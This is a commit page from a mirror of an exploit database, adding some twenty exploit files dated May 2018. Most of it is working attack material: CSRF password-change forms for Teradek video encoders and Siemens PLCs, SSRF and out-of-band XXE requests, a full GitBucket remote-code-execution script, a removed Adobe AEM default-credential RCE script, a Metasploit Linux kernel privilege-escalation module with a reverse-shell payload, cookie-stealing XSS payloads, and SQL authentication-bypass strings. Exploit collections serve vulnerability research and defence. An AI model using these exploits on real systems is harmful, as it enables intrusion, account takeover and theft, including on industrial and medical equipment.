bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2018-05-22

Browse source 
23 changes to exploits/shellcodes

Linux 2.6.30 < 2.6.36-rc8 - Reliable Datagram Sockets (RDS) Privilege Escalation (Metasploit)
R 3.4.4 - Local Buffer Overflow (DEP Bypass)

KYOCERA Multi-Set Template Editor 3.4 - Out-Of-Band XML External Entity Injection

Adobe Enterprise Manager (AEM) < 6.3 - Remote Code Execution
Superfood 1.0 - Multiple Vulnerabilities
Private Message PHP Script 2.0 - Persistent Cross-Site Scripting
Flippy DamnFacts - Viral Fun Facts Sharing Script 1.1.0 - Persistent Cross-Site Scripting / Cross-Site Request Forgery
Zenar Content Management System - Cross-Site Scripting
GitBucket 4.23.1 - Remote Code Execution
ManageEngine Recovery Manager Plus 5.3 - Persistent Cross-Site Scripting
Siemens SIMATIC S7-1200 CPU - Cross-Site Request Forgery
Teradek VidiU Pro 3.0.3 - Cross-Site Request Forgery
Teradek VidiU Pro 3.0.3 - Server-Side Request Forgery
Teradek Cube 7.3.6 - Cross-Site Request Forgery
Teradek Slice 7.3.15 - Cross-Site Request Forgery
Schneider Electric PLCs - Cross-Site Request Forgery
Auto Dealership & Vehicle Showroom WebSys 1.0 - Persistent Cross-Site Scripting / Cross-Site Request Forgery / Admin Panel Authentication Bypass
Merge PACS 7.0 - Cross-Site Request Forgery
Model Agency Media House & Model Gallery 1.0 - Persistent Cross-Site Scripting / Cross-Site Request Forgery / Authentication Bypass
Wchat PHP AJAX Chat Script  1.5 - Persistent Cross-Site Scripting
This commit is contained in:
Offensive Security 2018-05-22 05:01:47 +00:00
parent 42f3759885
commit 08c35595ed
21 changed files with 1240 additions and 58 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

53
exploits/hardware/webapps/44671.html Normal file
View file

@ -0,0 +1,53 @@
<!--
Teradek VidiU Pro 3.0.3 CSRF Change Password Exploit
Vendor: Teradek, LLC
Product web page: https://www.teradek.com
Affected version: VidiU, VidiU Mini, VidiU Pro
3.0.3 (build 32136)
3.0.2 (build 31225)
2.4.10
Summary: The Teradek VidiU gives you the freedom to broadcast live
high definition video directly to the Web without a PC. Whether you're
streaming out of a video switcher or wirelessly from your camera,
VidiU allows you to go live when you want, where you want. VidiU
offers API level integration with the Ustream, YouTube Live and
Livestream platforms, which makes streaming to your channel as
easy as logging into your account.
Desc: The application interface allows users to perform certain
actions via HTTP requests without performing any validity checks
to verify the requests. This can be exploited to perform certain
actions with administrative privileges if a logged-in user visits
a malicious web site.
Tested on: lighttpd/1.4.48
lighttpd/1.4.31
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2018-5460
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5460.php
02.03.2018
-->
<html>
<body>
<form action="http://127.0.0.1:8090/cgi-bin/password.cgi">
<input type="hidden" name="pw1" value="P@ssw0rd" />
<input type="hidden" name="pw2" value="P@ssw0rd" />
<input type="hidden" name="user" value="admin" />
<input type="submit" value="Initiate" />
</form>
</body>
</html>

118
exploits/hardware/webapps/44672.txt Normal file
View file

@ -0,0 +1,118 @@
Teradek VidiU Pro 3.0.3 SSRF Vulnerability
Vendor: Teradek, LLC
Product web page: https://www.teradek.com
Affected version: VidiU, VidiU Mini, VidiU Pro
3.0.3r32136
3.0.2r31225
2.4.10
Summary: The Teradek VidiU gives you the freedom to broadcast live
high definition video directly to the Web without a PC. Whether you're
streaming out of a video switcher or wirelessly from your camera,
VidiU allows you to go live when you want, where you want. VidiU
offers API level integration with the Ustream, YouTube Live and
Livestream platforms, which makes streaming to your channel as
easy as logging into your account.
Desc: A server-side request forgery (SSRF) vulnerability exists in
the VidiU management interface within the RTMP settings and the Wowza
server mode functionality. The application parses user supplied data
in the GET parameters 'url' and 'xml_url' to construct a page request
that loads the configuration for specific service. Since no validation
is carried out on the parameters, an attacker can specify an external
domain and force the application to make a HTTP request to an arbitrary
destination host, including xml data parsing (XXE potential). This can
be used by an external attacker for example to bypass firewalls and
initiate a service and network enumeration on the internal network
through the affected application.
Tested on: lighttpd/1.4.48
lighttpd/1.4.31
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2018-5461
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5461.php
02.03.2018
--
SSRF open port:
---------------
GET /cgi-bin/wowza.cgi?command=read_url&url=zeroscience.mk:443&_=1526243349301 HTTP/1.1
Host: 127.0.0.1:8090
HTTP/1.1 200 OK
Content-Type: application/json
Connection: close
Date: Sun, 13 May 2018 21:42:30 GMT
Server: lighttpd/1.4.31
Content-Length: 31
{"error":"invalid parameters"}
SSRF closed port:
-----------------
GET /cgi-bin/wowza.cgi?command=read_url&url=zeroscience.mk:7777&_=1526243349301 HTTP/1.1
Host: 127.0.0.1:8090
HTTP/1.1 200 OK
Content-Length: 0
Connection: close
Date: Sun, 13 May 2018 21:43:30 GMT
Server: lighttpd/1.4.31
===================================================
SSRF closed port:
-----------------
GET /cgi-bin/system.cgi?command=rtmp&action=rtmp_xml_from_url&xml_url=zeroscience.mk:7777&_=1526244218671 HTTP/1.1
Host: 127.0.0.1:8090
{"result":"error", "error":"Curl error"}
SSRF open port:
---------------
GET /cgi-bin/system.cgi?command=rtmp&action=rtmp_xml_from_url&xml_url=zeroscience.mk:443&_=1526244218671 HTTP/1.1
Host: 127.0.0.1:8090
{"result":"error", "error":"Bad request"}
===================================================
PoC CSRF Blind XXE SSRF OOB:
----------------------------
<html>
<body>
<form action="http://127.0.0.1:8090/cgi-bin/system.cgi">
<input type="hidden" name="command" value="rtmp" />
<input type="hidden" name="action" value="rtmp_xml_from_url" />
<input type="hidden" name="xml_url" value="http://site.tld/xxe.xml" />
<input type="hidden" name="_" value="1526244218671" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>

50
exploits/hardware/webapps/44675.html Normal file
View file

@ -0,0 +1,50 @@
<!--
Teradek Cube 7.3.6 CSRF Change Password Exploit
Vendor: Teradek, LLC
Product web page: https://www.teradek.com
Affected version: Firmware Version: 7.3.6 (build 26850)
Hardware Version: 1.5
Teradek Firmware Version 7.3.15
Summary: Cube packs world-class video quality into a rugged, portable
chassis for quick IP video deployments at any location. Each encoder
and decoder includes HDMI and 3G-SDI I/O, Ethernet / WiFI connectivity,
and full duplex IFB.
Desc: The application interface allows users to perform certain actions
via HTTP requests without performing any validity checks to verify the
requests. This can be exploited to perform certain actions with administrative
privileges if a logged-in user visits a malicious web site.
Tested on: lighttpd/1.4.31
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2018-5464
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5464.php
02.03.2018
-->
<html>
<body>
<form action="http://127.0.0.1/cgi-bin/system.cgi" method="POST">
<input type="hidden" name="command" value="password" />
<input type="hidden" name="pw1" value="P@ssw0rd" />
<input type="hidden" name="pw2" value="P@ssw0rd" />
<input type="hidden" name="user" value="admin" />
<input type="hidden" name="action" value="Change&#32;Password" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>

48
exploits/hardware/webapps/44676.html Normal file
View file

@ -0,0 +1,48 @@
<!--
Teradek Slice 7.3.15 CSRF Change Password Exploit
Vendor: Teradek, LLC
Product web page: https://www.teradek.com
Affected version: Firmware Version: 7.3.15 (build 31735)
Hardware Version: 2.1
Summary: Built on the award-winning Cube platform, Slice is a rack mount
HEVC / H.264 codec designed to fit seamlessly into your broadcast studio.
Like the Cube, Slice encoders and decoders includes 3G-SDI and HDMI I/O,
Ethernet and WiFi connectivity, and full duplex IFB.
Desc: The application interface allows users to perform certain actions
via HTTP requests without performing any validity checks to verify the
requests. This can be exploited to perform certain actions with administrative
privileges if a logged-in user visits a malicious web site.
Tested on: lighttpd/1.4.48
lighttpd/1.4.31
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2018-5467
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5467.php
02.03.2018
-->
<html>
<body>
<form action="http://127.0.0.1:8090/cgi-bin/password.cgi">
<input type="hidden" name="pw1" value="P@ssw0rd" />
<input type="hidden" name="pw2" value="P@ssw0rd" />
<input type="hidden" name="user" value="admin" />
<input type="submit" value="Initiate" />
</form>
</body>
</html>

35
exploits/java/webapps/44666.txt Normal file
View file

@ -0,0 +1,35 @@
# Exploit Title: ManageEngine Recovery Manager Plus 5.3 (Build 5330) - Persistent Cross-Site Scripting
# Dated: 2018-03-31
# Exploit Author: Ahmet GÜREL
# Software Link: https://www.manageengine.com/ad-recovery-manager/
# Version: < = 5.3 (Build 5330)
# Platform: Java
# Tested on: Windows
# CVE: CVE-2018-9163
# 1. DETAILS
# In the Add New Technician (s) section on the /admin/technicians page of the
# ManageEngine Recovery Manager Plus 5.3 (Build 5330) application, allows
# remote authenticated users with the Login Name parameter is vulnerable to
# XSS. The parameters entered are written in the database and affect all
# users.
# 2. PoC:
# From the Add New Technician (s) page, it is possible to inject malicious
# web code inside Login Name parameter. The HTTP request looks like the following:
GET
/technicianAction.do?req={%22domainId%22:0,%22loginName%22:%22%3Csvg%20onload%3Dprompt(document.domain)%3E%22,%22password%22:%22Test123%22,%22isDomainUser%22:false,%22roleId%22:1,%22operation%22:%22createTechnicians%22}
HTTP/1.1
Host: 172.16.219.168:8090
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:59.0)
Gecko/20100101 Firefox/59.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://172.16.219.168:8090/
Content-Type: application/json; charset=utf-8
X-Requested-With: XMLHttpRequest
Cookie: JSESSIONIDRMP=64556C394C0687AA34179CFE2EF4EA5A;
JSESSIONIDSSO=0605E8EB825B181A4A201542A518457D
Connection: close

171
exploits/java/webapps/44668.py Executable file
View file

@ -0,0 +1,171 @@
# Exploit Title: GitBucket 4.23.1 Unauthenticated RCE
# Date: 21-05-2018
# Software Link: https://github.com/gitbucket/gitbucket
# Exploit Author: Kacper Szurek
# Contact: https://twitter.com/KacperSzurek
# Website: https://security.szurek.pl/
# Category: remote
1. Description
Abusing weak secret token and passing insecure parameter to File function.
2. Proof of Concept
import os
try:
from Crypto.Cipher import Blowfish
except:
print "pip install pycrypto"
os._exit(0)
import binascii
import base64
import urllib2
import urllib
import time
import sys
import pickle
print "GitBucket 4.23.1 Unauthenticated RCE"
print "by Kacper Szurek"
print "https://security.szurek.pl/"
print "Working only when server is installed on Windows"
def PKCS5Padding(string):
byteNum = len(string)
packingLength = 8 - byteNum % 8
appendage = chr(packingLength) * packingLength
return string + appendage
def encrypt(content, key):
content = PKCS5Padding(content)
cipher = Blowfish.new(key, Blowfish.MODE_ECB)
return base64.b64encode(cipher.encrypt(content))
def get_file(git_bucket_url, file, key, expiration_time):
payload = "{} {}".format(expiration_time, file)
authorization = encrypt(payload, key)
url = "{}/git-lfs/aa/bb/{}".format(git_bucket_url, file)
try:
request = urllib2.Request(url)
request.add_header("Authorization", authorization)
result = urllib2.urlopen(request).read()
return result
except Exception, e:
# If payload is correct and file does not exist, we got error 400
if not "Error 500" in e.read():
return 'OK'
def put_file(git_bucket_url, file, key, expiration_time, content):
payload = "{} {}".format(expiration_time, file)
authorization = encrypt(payload, key)
url = "{}/git-lfs/aa/bb/{}".format(git_bucket_url, file)
try:
request = urllib2.Request(url, data=content)
request.add_header("Authorization", authorization)
request.get_method = lambda: 'PUT'
result = urllib2.urlopen(request)
return result.getcode() == 200
except Exception, e:
return None
def send_command(git_bucket_url, command):
try:
result = urllib2.urlopen("{}/exploit?{}".format(git_bucket_url, urllib.urlencode({'command' : command}))).read()
return result
except:
return None
def pickle_key(url, key):
output = open(pickle_path, "wb")
pickle.dump({'url' : url, 'key' : key}, output)
output.close()
print "[+] Key pickled for futher use"
def unpickle_key(url):
if os.path.isfile(pickle_path):
pickled_file = open(pickle_path, "rb")
data = pickle.load(pickled_file)
pickled_file.close()
if data['url'] == url:
return data['key']
return None
if len(sys.argv) != 3:
print "[-] Usage: exploit.py url command"
os._exit(0)
exploit_jar = 'exploit.jar'
url = sys.argv[1]
command = sys.argv[2]
pickle_path = 'gitbucket.pickle'
if url.endswith('/'):
url = url[0:-1]
try:
is_gitbucket = urllib2.urlopen("{}/api/v3/".format(url), timeout=5).read()
except:
is_gitbucket = ""
if not is_gitbucket.startswith('{"rate_limit_url"'):
print "[-] Probably not gitbucket url: {}".format(url)
os._exit(0)
if not os.path.isfile(exploit_jar):
print "[-] Missing exploit file: {}".format(exploit_jar)
os._exit(0)
expiration_time = int(round(time.time() * 1000))+(1000*6000)
print "[+] Set expire time to: {}".format(expiration_time)
print "[+] Start search blowfish key: "
for i in range(0, 10000):
if i % 100 == 0:
print "+",
potential_key = unpickle_key(url)
if potential_key:
print "\n[+] Unpickle key, try it"
else:
potential_key = str(i).zfill(4)
config_path = "non_existing_file"
config_content = get_file(url, config_path, potential_key, expiration_time)
if config_content:
print "\n[+] Found blowfish key: {}".format(potential_key)
print "[+] Config content:\n{}".format(config_content)
exploit_path = "..\..\..\..\plugins\exploit.jar"
f = open(exploit_jar, "rb")
exploit_content = f.read()
f.close()
if put_file(url, exploit_path, potential_key, expiration_time, exploit_content):
print "[+] Wait few second for plugin load"
time.sleep(5)
command_content = send_command(url, "cmd /c {}".format(command))
if command_content:
pickle_key(url, potential_key)
print command_content
else:
print "[-] Cannot execute command"
else:
print "[-] Cannot upload exploit.jar"
os._exit(0)
3. Solution:
Update to version 4.24.1
https://github.com/gitbucket/gitbucket/releases/download/4.24.1/gitbucket.war

56
exploits/jsp/webapps/44659.py
View file

@ -1,56 +0,0 @@
# Exploit Title: Adobe Experience Manager (AEM) < 6.3 default credentials leads to RCE
# Date: 5/19/18
# Exploit Author: StaticFlow
# Vendor Homepage: https://www.adobe.com/in/marketing-cloud/experience-manager.html
# Version: < 6.3
import requests
import sys
baseUrl = 'https://test.com/' #default domain, change here or pass in on command line
credentialList = [['anonymous','anonymous'], ['author','author'], ['admin','admin']]
exploit = 'rce.jsp' #default file name, must be in same dir as python file or passed in on command line
def testLogins():
for credential in credentialList:
response = requests.get(baseUrl, auth=(credential[0], credential[1]))
if(response.status_code == 200):
return credential
return False
if len(sys.argv) == 2:
baseUrl = sys.argv[1]
if len(sys.argv) == 3:
exploit = sys.argv[2]
gotCreds = testLogins()
if(gotCreds):
attackChain = [
{
'jcr:primaryType': (None, 'nt:folder') #create a folder for our exploit
},
{
'exec.jsp': ('rce.jsp', open(exploit, 'rb')) #upload the exploit
},
{
':operation': (None, 'copy'), #copy exploit folder over to app folder for staging
':dest': (None, '/apps/rcetype')
},
{
'sling:resourceType': (None, 'rcetype') #instruct Apache Sling to initialize our exploit code as a servlet
}
]
print "creating folder structure and uploading exploit"
for attack in attackChain[:-1]:
response = requests.post(baseUrl+'content/rcetype', files=attack, auth=(gotCreds[0], gotCreds[1]))
if response.status_code > 201:
print "Something went wrong, request returned a "+str(response.status_code)+". Here's the response:"
print response.content
sys.exit(0)
print "initializing servlet from exploit"
response = requests.post(baseUrl+'content/rce', files=attackChain[-1], auth=(gotCreds[0], gotCreds[1]))
if response.status_code > 201:
print "Something went wrong, request returned a "+str(response.status_code)+". Here's the response:"
print response.content
sys.exit(0)
print """Should be good to go, run 'curl -X "GET" -u {}:{} {}' and your exploit should run""".format(gotCreds[0],gotCreds[1],baseUrl+'content/rce.exec')

187
exploits/linux/local/44677.rb Executable file
View file

@ -0,0 +1,187 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Local
Rank = GreatRanking
include Msf::Post::File
include Msf::Post::Linux::Priv
include Msf::Post::Linux::System
include Msf::Post::Linux::Kernel
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'Reliable Datagram Sockets (RDS) Privilege Escalation',
'Description' => %q{
This module exploits a vulnerability in the rds_page_copy_user function
in net/rds/page.c (RDS) in Linux kernel versions 2.6.30 to 2.6.36-rc8
to execute code as root (CVE-2010-3904).
This module has been tested successfully on Fedora 13 (i686) with
kernel version 2.6.33.3-85.fc13.i686.PAE and Ubuntu 10.04 (x86_64)
with kernel version 2.6.32-21-generic.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Dan Rosenberg', # Discovery and C exploit
'Brendan Coles' # Metasploit
],
'DisclosureDate' => 'Oct 20 2010',
'Platform' => [ 'linux' ],
'Arch' => [ ARCH_X86, ARCH_X64 ],
'SessionTypes' => [ 'shell', 'meterpreter' ],
'Targets' => [[ 'Auto', {} ]],
'Privileged' => true,
'References' =>
[
[ 'AKA', 'rds-fail.c' ],
[ 'EDB', '15285' ],
[ 'CVE', '2010-3904' ],
[ 'BID', '44219' ],
[ 'URL', 'https://securitytracker.com/id?1024613' ],
[ 'URL', 'https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=799c10559d60f159ab2232203f222f18fa3c4a5f' ],
[ 'URL', 'http://vulnfactory.org/exploits/rds-fail.c' ],
[ 'URL', 'http://web.archive.org/web/20101020044047/http://www.vsecurity.com/resources/advisory/20101019-1/' ],
[ 'URL', 'http://web.archive.org/web/20101020044048/http://www.vsecurity.com/download/tools/linux-rds-exploit.c' ],
],
'DefaultOptions' =>
{
'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp',
'WfsDelay' => 10,
'PrependFork' => true
},
'DefaultTarget' => 0))
register_options [
OptEnum.new('COMPILE', [ true, 'Compile on target', 'Auto', %w(Auto True False) ]),
OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]),
]
end
def base_dir
datastore['WritableDir'].to_s
end
def modules_disabled?
modules_disabled = cmd_exec('cat /proc/sys/kernel/modules_disabled').to_s.strip
(modules_disabled.eql?('1') || modules_disabled.eql?('2'))
end
def upload(path, data)
print_status "Writing '#{path}' (#{data.size} bytes) ..."
rm_f path
write_file path, data
register_file_for_cleanup path
end
def upload_and_chmodx(path, data)
upload path, data
cmd_exec "chmod +x '#{path}'"
end
def upload_and_compile(path, data)
upload "#{path}.c", data
output = cmd_exec "gcc -o #{path} #{path}.c"
unless output.blank?
print_error output
fail_with Failure::Unknown, "#{path}.c failed to compile"
end
cmd_exec "chmod +x #{path}"
register_file_for_cleanup path
end
def exploit_data(file)
path = ::File.join Msf::Config.data_directory, 'exploits', 'cve-2010-3904', file
fd = ::File.open path, 'rb'
data = fd.read fd.stat.size
fd.close
data
end
def live_compile?
return false unless datastore['COMPILE'].eql?('Auto') || datastore['COMPILE'].eql?('True')
if has_gcc?
vprint_good 'gcc is installed'
return true
end
unless datastore['COMPILE'].eql? 'Auto'
fail_with Failure::BadConfig, 'gcc is not installed. Compiling will fail.'
end
end
def check
version = kernel_release
unless Gem::Version.new(version.split('-').first) >= Gem::Version.new('2.6.30') &&
Gem::Version.new(version.split('-').first) < Gem::Version.new('2.6.37')
vprint_error "Linux kernel version #{version} is not vulnerable"
return CheckCode::Safe
end
vprint_good "Linux kernel version #{version} appears to be vulnerable"
unless cmd_exec('/sbin/modinfo rds').to_s.include? 'Reliable Datagram Sockets'
vprint_error 'RDS kernel module is not available'
return CheckCode::Safe
end
vprint_good 'RDS kernel module is available'
if modules_disabled?
unless cmd_exec('/sbin/lsmod').to_s.include? 'rds'
vprint_error 'RDS kernel module is not loadable'
return CheckCode::Safe
end
end
vprint_good 'RDS kernel module is loadable'
CheckCode::Appears
end
def exploit
unless check == CheckCode::Appears
fail_with Failure::NotVulnerable, 'Target is not vulnerable'
end
if is_root?
fail_with Failure::BadConfig, 'Session already has root privileges'
end
unless cmd_exec("test -w '#{base_dir}' && echo true").include? 'true'
fail_with Failure::BadConfig, "#{base_dir} is not writable"
end
# Upload exploit executable
executable_name = ".#{rand_text_alphanumeric rand(5..10)}"
executable_path = "#{base_dir}/#{executable_name}"
if live_compile?
vprint_status 'Live compiling exploit on system...'
upload_and_compile executable_path, exploit_data('rds-fail.c')
else
vprint_status 'Dropping pre-compiled exploit on system...'
arch = kernel_hardware
case arch
when /amd64|ia64|x86_64|x64/i
upload_and_chmodx executable_path, exploit_data('rds-fail.x64')
when /x86|i[3456]86/
upload_and_chmodx executable_path, exploit_data('rds-fail.x86')
else
fail_with Failure::NoTarget, "No pre-compiled binaries are available for system architecture: #{arch}"
end
end
# Upload payload executable
payload_path = "#{base_dir}/.#{rand_text_alphanumeric rand(5..10)}"
upload_and_chmodx payload_path, generate_payload_exe
# Launch exploit
print_status 'Launching exploit...'
output = cmd_exec "#{executable_path} #{payload_path}"
output.each_line { |line| vprint_status line.chomp }
end
end

15
exploits/linux/webapps/44667.txt Normal file
View file

@ -0,0 +1,15 @@
# Exploit Title: Siemens SIMATIC S7-1200 CPU - Cross-Site Request Forgery
# Google Dork: inurl:/Portal/Portal.mwsl
# Date: 2018-05-21
# Exploit Author: t4rkd3vilz, Jameel Nabbo
# Vendor Homepage: https://www.siemens.com/
# Version: SIMATIC S7-1200 CPU family: All versions prior to V4.1.3
# Tested on: Kali Linux
# CVE: CVE-2015- 5698
# 1. Proof of Concept
<form method="POST" action="http://targetIp/CPUCommands">
<input name="PriNav" value="Start">
<input type="submit" value="Go!">
</form>

39
exploits/linux/webapps/44681.txt Normal file
View file

@ -0,0 +1,39 @@
# Exploit Title: Merge PACS 7.0 - Cross-Site Request Forgery
# Google Dork: -
# Date: 2018-05-21
# Exploit Author: Safak Aslan
# Vendor Homepage: http://www.merge.com/
# Version: Merge PACS 7.0
# Tested on: Windows
# CVE: -
# 1. Proof of Concept
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://targetIP/servlet/actions/merge-viewer/summary" method="POST">
<input type="hidden" name="amicasUsername" value="merge" />
<input type="hidden" name="password" value="viewer" />
<input type="hidden" name="submitButton" value="Login" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Post Data:
POST /servlet/actions/merge-viewer/summary HTTP/1.1
Host: targetIP
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en,tr-TR;q=0.8,tr;q=0.5,en-US;q=0.3
Accept-Encoding: gzip, deflate
Referer: https://targetIP/servlet/actions/merge-viewer/login?redirectTo=https%3A%2F%2FtargetIP%2Fservlet%2Factions%2Fmerge-viewer%2Fsummary
Content-Type: application/x-www-form-urlencoded
Content-Length: 55
Cookie: JSESSIONID=6846606B53045FE6474A57C71719C93D
Connection: close
Upgrade-Insecure-Requests: 1
amicasUsername=merge&password=viewer&submitButton=Login

57
exploits/php/webapps/44661.txt Normal file
View file

@ -0,0 +1,57 @@
# Exploit Title: Superfood - Restaurants & Online Food Order System 1.0 - Persistent cross site scripting / Cross site request forgery / Admin panel Authentication bypass
# Date: 2018-05-20
# Exploit Author: Borna nematzadeh (L0RD) or borna.nematzadeh123@gmail.com
# Vendor Homepage: https://codecanyon.net/item/superfood-restaurants-online-food-order-system/16855836?s_rank=30
# Version: 1.0
# Tested on: Kali linux
====================================================
# Description:
Superfood - Restaurants & Online Food Order System 1.0 suffers from multiple vulnerabilities :
====================================================
# POC 1 : Persistent cross site scripting :
1) After creating an account , go to your profile.
2) Navigate to "Update profile" and put this payload :
"/><script>alert('xss')</script>
3) You will have an alert box in the page .
====================================================
# POC 2 : CSRF :
Attacker can change user's authentication directly :
# User's CSRF exploit :
<html>
<head>
<title>CSRF POC</title>
</head>
<body>
<form action="http://restaurant.thesoftking.com/updateprofile"
method="post">
<input type="hidden" name="name" value="anything">
<input type="hidden" name="mobile" value="1000000000">
<input type="hidden" name="address" value="anything">
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
# Admin page CSRF exploit :
<form action="http://restaurant.thesoftking.com/admin/setgeneral.php"
method="post">
<input name="name" value="exploit" type="hidden">
<input name="wcmsg" value="test" type="hidden">
<input name="address" value="test2" type="hidden">
<input name="mobile" value="1000000" type="hidden">
<input name="email" value="test@test.com" type="hidden">
<input name="currency" value="decode" type="hidden">
</form>
<script>
document.forms[0].submit();
</script>
====================================================
# POC 3 : Authentication bypass :
# Attacker can bypass admin panel without any authentication :
Path : /admin
Username : ' or 0=0 #
Password : anything
====================================================

18
exploits/php/webapps/44662.txt Normal file
View file

@ -0,0 +1,18 @@
# Exploit Title: Private Message PHP Script 2.0 - Persistent Cross-Site scripting
# Date: 2018-05-20
# Exploit Author: Borna nematzadeh (L0RD)
# Vendor Homepage: https://codecanyon.net/item/private-message-php-script/21027192?s_rank=1
# Version: 2.0
# Tested on: Windows
# Description :
Private Message PHP Script 2.0 suffers from persistent cross site scripting.
You can put your malicious javascript payload .
When target opens your massege , payload will be executed before self destruction .
# POC :
1) Put this payload into textarea and click submit :
</textarea><script>alert(document.cookie)</script>
2) You will get a link which your javascript code is inside this link . You can send this link to anyone .
3) After clicking on "show me the message" , payload will be executed .

34
exploits/php/webapps/44663.txt Normal file
View file

@ -0,0 +1,34 @@
# Exploit Title: Flippy DamnFacts - Viral Fun Facts Sharing Script 1.1.0 - Persistent cross site scripting / Cross site request forgery
# Date: 2018-05-20
# Dork: N/A
# Exploit Author: borna nematzadeh (L0RD)
# Vendor Homepage: https://www.codegrape.com/item/flippy-damnfacts-viral-fun-facts-sharing-script/3630
# Version: 1.1.0
# Tested on: Kali linux
# POC 1 : Persistent Cross site scripting :
1) After creating an account , navigate to "Edit profile" .
2) Put this payload into the "Birthday" and save changes :
" onmouseover=alert(document.cookie) "
3) You will have an alert box in the page .
# POC 2 : Cross site request forgery :
<html>
<head>
<title>CSRF POC</title>
</head>
<body>
<form action="http://damnfacts.flippydemos.com/submit_profile.php" method="POST">
<input type="hidden" name="sex" value="Male" />
<input type="hidden" name="birthday" value="test" />
<input type="hidden" name="uEmail" value="ninjaassassinbn&#64;yahoo&#46;com" />
<input type="hidden" name="country" value="United&#32;States" />
<input type="hidden" name="about" value="test" />
</form>
<script>
document.forms[0].submit();
// profile will be updated successfully.
</script>
</body>
</html>

41
exploits/php/webapps/44664.txt Normal file
View file

@ -0,0 +1,41 @@
# Exploit Title: Zenar Content Management System - Cross-Site Scripting
# Software Link: https://zenar.io/
# Dork: N/A
# Author: Berk Dusunur
# Tested Website: http://demo.zenar.io
# Date: 2018-05-20
# Category: Web App
# PoC
# GET Request:
POST /zenario/ajax.php?method_call=refreshPlugin&inIframe=true HTTP/1.1
Host: demo.zenar.io
Cache-Control: no-cache
Connection: Keep-Alive
Accept: text/plain, */*; q=0.01
Origin: http://demo.zenar.io
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36
X-Requested-With: XMLHttpRequest
Referer: http://demo.zenar.io/enquiries/newsletter-sign-up
Accept-Language: en-us,en;q=0.5
X-Scanner: Netsparker
Cookie: PHPSESSID=27pdf3fd0plfnarmh5edk5es33
Accept-Encoding: gzip, deflate
Content-Length: 273
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
cID=25&slideId=3&cType=html&slotName=Slot_Main_2&instanceId=143&containerId=plgslt_Slot_Main_2&formPageHash=35263a7d5401cb22f77e67fb50fcdd99&reloaded=1&inFullScreen=3&field_14=netsparker%40example.com&current_page='"--></style></scRipt><scRipt>alert(EZK)</scRipt>
# Response:
<input type="hidden" name="formPageHash"
value="35263a7d5401cb22f77e67fb50fcdd99"/><input type="hidden"
name="reloaded" value="1"/><input type="hidden" name="inFullScreen"
value="1"/><fieldset
id="plgslt_Slot_Main_2_page_'"--></style></scRipt><scRipt>alert(EZK)</scRipt>"
class="page_"><div class="form_fields"></div><div
class="form_buttons"><input type="button" value=""
class="next"/></div>

52
exploits/php/webapps/44679.txt Normal file
View file

@ -0,0 +1,52 @@
# Exploit Title: Auto Dealership & Vehicle Showroom WebSys 1.0 - Persistent Cross-Site Scripting / Cross-Site Request Forgery / Admin panel Authentication bypass
# Date: 2018-05-21
# Exploit Author: Borna nematzadeh (L0RD) or borna.nematzadeh123@gmail.com
# Vendor Homepage: https://codecanyon.net/item/auto-dealership-vehicle-showroom-websys/17013273?s_rank=28
# Version: 1.0
# Tested on: Kali linux
# Description: Auto Dealership & Vehicle Showroom WebSys 1.0 suffers from multiple vulnerabilities:
# POC 1 : Persistent cross site scripting :
1) After creating an account , go to your profile.
2) Navigate to "Update profile" and put this payload :
"/><script>alert(document.cookie)</script>
3) You will have an alert box in the page .
# POC 2 : CSRF :
# Attacker can change user's authentication directly :
# User's CSRF exploit :
<html>
<head>
<title>CSRF POC</title>
</head>
<body>
<form action="http://vehicle.thesoftking.com/updateprofile" method="post">
<input type="hidden" name="name" value="anything">
<input type="hidden" name="mobile" value="200000">
<input type="hidden" name="address" value="anything">
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
# Admin page CSRF exploit :
<form action="http://vehicle.thesoftking.com/admin/setgeneral.php" method="post">
<input name="name" value="test" type="hidden">
<input name="wcmsg" value="test" type="hidden">
<input name="address" value="test2" type="hidden">
<input name="mobile" value="2000000" type="hidden">
<input name="email" value="test@test.com" type="hidden">
<input name="currency" value="decode" type="hidden">
</form>
<script>
document.forms[0].submit();
</script>
# POC 3 : Authentication bypass :
Path : /admin
Username : ' or 0=0 #
Password : anything

56
exploits/php/webapps/44682.txt Normal file
View file

@ -0,0 +1,56 @@
